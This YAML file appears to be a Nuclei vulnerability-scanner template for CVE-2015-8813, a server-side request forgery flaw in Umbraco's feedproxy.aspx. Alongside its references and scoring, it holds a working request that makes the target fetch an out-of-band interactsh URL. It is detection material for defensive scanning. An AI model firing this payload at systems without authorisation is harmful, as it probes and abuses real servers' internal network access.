nuclei-templates/cves/2015/CVE-2015-8813.yaml

32 lines
1.1 KiB
YAML

id: CVE-2015-8813
info:
name: Umbraco <7.4.0- Server-Side Request Forgery
author: emadshanab
severity: high
description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
reference:
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
- https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
- http://www.openwall.com/lists/oss-security/2016/02/18/8
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2015-8813
cwe-id: CWE-918
tags: cve,cve2015,ssrf,oast,umbraco
requests:
- method: GET
path:
- "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/06/08